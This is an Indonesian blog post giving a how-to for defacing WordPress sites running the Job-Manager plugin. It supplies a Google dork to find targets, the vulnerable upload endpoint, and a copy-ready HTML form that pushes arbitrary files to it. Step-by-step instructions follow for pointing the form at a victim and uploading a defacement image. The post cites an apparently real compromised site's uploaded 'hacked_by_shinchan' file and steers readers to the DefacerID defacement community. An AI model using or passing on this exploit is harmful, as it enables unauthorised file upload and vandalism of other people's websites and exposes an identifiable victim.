Cara Deface WordPress Job-Manager dengan CSRF


Hello semuanya ^_^
Sebelumnya, selamat hari raya Idul Fitri 1438H untuk semua umat islam :) oke untuk Cara Deface WordPress Job-Manager langsung simak aja di bawah ini.
  • Google Dork : inurl:"/post-a-job" (maybe)
  • Exploit : /jm-ajax/upload_file
  • CSRF simpan dengan ekstensi.html
    <form method='post' action='target.com/jm-ajax/upload_file' enctype="multipart/form-data"><input type='file' name='file[]' /><input type='submit' value='hajar' /></form>
  • yang pertama cari target dengan Google Dork diatas, lalu masukin exploit nya. jika vuln tampilannya seperti ini.
  • Edit CSRF diatas dan pada action='target.com/jm-ajax/upload_file' ganti dengan target kalian. Lalu upload file.jpg kalian.
  • Jika sukses maka ajan seperti ini, langsung kalian buka aja "http:\/\/www.shorehrsolutions.com\/wp-content\/uploads\/job-manager-uploads\/file\/2017\/06\/hacked_by_shinchan.png"
 
  •  bisa kan?


Buat yang maen di DefacerID langsung baca ini, karena di DefacerID gabisa mirror Image.
Cara Mirror Image Di DefacerID (JPG, PNG, BMP, DLL)

Terimakasih sudah berkunjung ^_^


EmoticonEmoticon